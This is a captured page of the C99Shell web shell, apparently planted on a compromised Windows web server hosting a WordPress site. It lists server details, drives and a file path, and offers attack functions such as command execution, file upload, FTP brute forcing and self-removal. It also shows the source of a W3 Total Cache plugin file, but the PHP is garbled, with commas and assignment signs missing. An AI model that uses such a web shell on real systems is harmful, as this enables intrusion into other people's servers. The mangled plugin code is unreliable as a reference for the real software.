!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\copia nuevo\htdocs\cumbreclima\wp-content\plugins\w3-total-cache\lib\W3\UI\Settings\   drwxrwxrwx
Free 4.94 GB of 239.26 GB (2.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     SettingsBase.php (1.63 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if (!defined('W3TC')) { die(); }

/**
 * Class W3_UI_Settings_SettingsBase
 */
abstract class W3_UI_Settings_SettingsBase {

    
/**
     * Gets the label connected with a config key in the provided area
     * @param string $config_key
     * @param string $area get the
     * @return string
     */
    
public function get_label($config_key$area) {
        
$strings $this->strings();
        if (isset(
$strings[$area][$config_key]))
            return 
$strings[$area][$config_key];
        else {
            
$meta $this->_get_meta($config_key);
            if (
$meta) {
                return 
$meta['label'];
            }
            return 
'';
        }
    }

    
/**
     * Retrieves meta data concerning a config key, label and connected area
     * @param string $config_key
     * @return string
     */
    
public function get_meta($config_key) {
        
$strings $this->strings();
        return 
$this->_get_meta($config_key);
    }

    
/**
     * Constructs and returns the meta data array.
     * @param $config_key
     * @return array|string
     */
    
private function _get_meta($config_key) {
        
$strings $this->strings();
        foreach (
$strings as $area => $settings) {
            foreach (
$settings as $key => $label) {
                if (
$key == $config_key)
                    return array(
'area' => $area'label' => $label);
            }
        }
        return 
'';
    }

    
/**
     * Returns the config keys and there related labels for various areas.
     * @return array
     */
    
protected abstract function strings();

    public function 
can_change($config_key$meta) {
        return 
true;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--